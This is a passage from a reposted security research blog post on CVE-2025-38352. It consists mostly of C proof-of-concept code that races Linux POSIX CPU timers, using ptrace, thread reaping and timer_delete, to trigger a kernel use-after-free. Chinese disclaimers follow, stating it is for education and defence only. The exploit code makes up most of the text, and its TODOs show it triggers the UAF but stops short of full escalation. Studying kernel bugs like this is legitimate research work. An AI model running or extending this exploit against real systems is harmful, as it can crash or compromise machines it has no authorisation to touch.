// fire the timers after `exit_notify()` wakes up the `waitpid()` in the exploit
// parent process
return;
}

voidsleep_func(void) {
// same CPU as REAPEE thread
pin_on_cpu(2);
char&nbsp;m;

prctl(PR_SET_NAME,&nbsp;"SLEEPER");

// Block and sleep without using the CPU
read(stall_fds[0], &m,&nbsp;1);
}

intmain(int&nbsp;argc,&nbsp;char&nbsp;*argv[]) {
// Loop for wrapper process
while&nbsp;(1) {
// Wrapper process setup
printf("Wrapper: try&nbsp;%d\n", ++retry_count);
SYSCHK(pipe(e2w));
pid_t&nbsp;exploit_pid =&nbsp;SYSCHK(fork());

if&nbsp;(exploit_pid) {
// wrapper process (pinning CPU here doesn't matter)
char&nbsp;m;
close(e2w[1]);

// Blocking read until retry
int&nbsp;read_count =&nbsp;read(e2w[0], &m,&nbsp;1);

// If read_count > 0, retry
if&nbsp;(read_count ==&nbsp;0)&nbsp;break;

// Decrease amount of loop times for next retry, but
// cap it at SYSCALL_LOOP_TIMES_MAX
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; syscall_loop_times++;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; syscall_loop_times %= SYSCALL_LOOP_TIMES_MAX+1;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; syscall_loop_times = syscall_loop_times ==&nbsp;0&nbsp;?&nbsp;20&nbsp;: syscall_loop_times;

// Close pipes so they can be recreated again
close(e2w[0]);

// Wait for exploit to exit
waitpid(exploit_pid,&nbsp;NULL, __WALL);
&nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;{
// exploit process
char&nbsp;m;
close(e2w[0]);

// Parent and child setup
// Use pipes to communicate between parent and child
SYSCHK(pipe(c2p));
SYSCHK(pipe(p2c));

// Get the average CPU time usage of the `getpid()` syscall, so we
// can use it for the trigger later
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; getpid_avg =&nbsp;getpid_cpu_usage();

pid_t&nbsp;pid =&nbsp;SYSCHK(fork());

if&nbsp;(pid) {
// exploit parent process
pin_on_cpu(1);
char&nbsp;m;
close(c2p[1]);
close(p2c[0]);

prctl(PR_SET_NAME,&nbsp;"EXPLOIT_PARENT");

// Receive child process's REAPEE thread's TID
pid_t&nbsp;tid;
SYSCHK(read(c2p[0], &tid,&nbsp;sizeof(pid_t)));

// Attach to the REAPEE thread and continue it
SYSCHK(ptrace(PTRACE_ATTACH, tid,&nbsp;NULL,&nbsp;NULL));
SYSCHK(waitpid(tid,&nbsp;NULL, __WALL));
SYSCHK(ptrace(PTRACE_CONT, tid,&nbsp;NULL,&nbsp;NULL));

// Signal to child that we attached and continued
SYSCHK(write(p2c[1], &m,&nbsp;1));

// Reap the REAPEE thread now. This will block and wait until
// the REAPEE thread is able to get through `exit_notify()` and
// wake this parent process up.
SYSCHK(waitpid(tid,&nbsp;NULL, __WALL));

// At this point, if UAF timer fired at the right time, the REAPEE thread
// will be reaped while it's `tsk->exit_state` is set to `EXIT_ZOMBIE`.
//
// Let the child process know REAPEE is reaped, so it can delete the
// timer.
SYSCHK(write(p2c[1], &m,&nbsp;1));

// Let the child process delete and free the timer, and
// all threads before exiting
SYSCHK(read(c2p[0], &m,&nbsp;1));

// Signal to wrapper process to retry and exit
// TODO exploit: Figure out how to detect if we triggered UAF here
SYSCHK(write(e2w[1], &m,&nbsp;1));

// Wait for child to exit before exiting
waitpid(pid,&nbsp;NULL, __WALL);
close(e2w[1]);
close(c2p[0]);
close(p2c[1]);
exit(0);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;else&nbsp;{
// exploit child process
pin_on_cpu(0);
char&nbsp;m;
close(c2p[0]);
close(p2c[1]);

// Pipefd for sleep threads to block on
SYSCHK(pipe(stall_fds));

// Block SIGUSR1, blocks them in subsequent threads too
sigset_t&nbsp;mask;
sigemptyset(&mask);
sigaddset(&mask, SIGUSR1);
sigprocmask(SIG_BLOCK, &mask,&nbsp;NULL);

prctl(PR_SET_NAME,&nbsp;"EXPLOIT_CHILD");
pthread_barrier_init(&barrier,&nbsp;NULL,&nbsp;2);

// Change this depending on KASAN vs no KASAN
int&nbsp;num_sleep_threads = NUM_SLEEP_THREADS;
pthread_t&nbsp;sleep_threads[num_sleep_threads];

SYSCHK(pthread_create(&reapee_thread,&nbsp;NULL, (void*)reapee_func,&nbsp;NULL));

for&nbsp;(int&nbsp;i =&nbsp;0; i < num_sleep_threads; i++) {
int&nbsp;ret =&nbsp;pthread_create(&sleep_threads[i],&nbsp;NULL, (void*)sleep_func,&nbsp;NULL);
if&nbsp;(ret !=&nbsp;0) {
// If this condition is reached, change `num_sleep_threads` above
printf("Failed on thread&nbsp;%d\n", i+1);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; num_sleep_threads = i;
break;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }

// Wait for all threads to create and go to sleep
usleep(10&nbsp;*&nbsp;1000);

// Parent process writes to us when attached and continued, use
// a barrier to continue the REAPEE thread now
SYSCHK(read(p2c[0], &m,&nbsp;1));
pthread_barrier_wait(&barrier);&nbsp;// barrier 1

// Wait for timers to be created by REAPEE thread
pthread_barrier_wait(&barrier);&nbsp;// barrier 2

// Arm the timers now, ensuring the first 18 are before the
// UAF timer
struct&nbsp;itimerspec ts = {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; .it_interval&nbsp;= {0,&nbsp;0},
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; .it_value&nbsp;= {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; .tv_sec&nbsp;=&nbsp;0,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; .tv_nsec&nbsp;= ONE_MS_NS -&nbsp;1,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; },
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; };

for&nbsp;(int&nbsp;i =&nbsp;0; i < NUM_TIMERS; i++) {
timer_settime(stall_timers[i],&nbsp;0, &ts,&nbsp;NULL);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }

// Arm UAF timer as the latest one
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ts.it_value.tv_nsec&nbsp;= ONE_MS_NS;
timer_settime(uaf_timer,&nbsp;0, &ts,&nbsp;NULL);

// Timers are armed, let REAPEE thread continue
pthread_barrier_wait(&barrier);&nbsp;// barrier 3

// Parent process writes to us when waitpid() returns successfully.
//
// At this point, if we won the race, `handle_posix_cpu_timers()` will be in
// the race window, and `timer_delete()` should see a NULL `sighand`, which
// will cause it to just free the timer unconditionally.
SYSCHK(read(p2c[0], &m,&nbsp;1));

// The race window is open for at least 3ms generally, so we can sleep
// 1ms to increase our chances to hit it with our free here.
//
// Might need to modify this for different systems, because it depends on
// how much time the race window is open for. KASAN will also not allow
// as many sleeper threads, so this will need to be lowered a bit if it's
// enabled.
usleep(1&nbsp;*&nbsp;1000);
timer_delete(uaf_timer);

// Let the timer be freed by RCU, then let the parent process know it can exit
wait_for_rcu();

// At this point, either the UAF triggered, and you'll see the kernel warning
// or KASAN splat, or we failed.
//
// TODO exploit: Figure out how to detect if we won the race here
for&nbsp;(int&nbsp;i =&nbsp;0; i < num_sleep_threads; i++) {
write(stall_fds[1], &m,&nbsp;1);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
for&nbsp;(int&nbsp;i =&nbsp;0; i < num_sleep_threads; i++) {
pthread_join(sleep_threads[i],&nbsp;NULL);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }

// Signal to parent to exit
SYSCHK(write(c2p[1], &m,&nbsp;1));

// Wait for parent to exit
close(c2p[1]);
close(p2c[0]);
close(stall_fds[0]);
close(stall_fds[1]);
exit(0);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }

// If we break out of the while loop above, the race was won
// TODO exploit:
exit(0);
}

Part 2 – Extending The Race Window Without a Kernel Patch

免责声明：本博客文章仅用于教育和研究目的。提供的所有技术和代码示例旨在帮助防御者理解攻击手法并提高安全态势。请勿使用此信息访问或干扰您不拥有或没有明确测试权限的系统。未经授权的使用可能违反法律和道德准则。作者对因应用所讨论概念而导致的任何误用或损害不承担任何责任。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：securitainment Faraz Faraz《CVE-2025-38352 Part 2 – 无需内核补丁延长竞争窗口》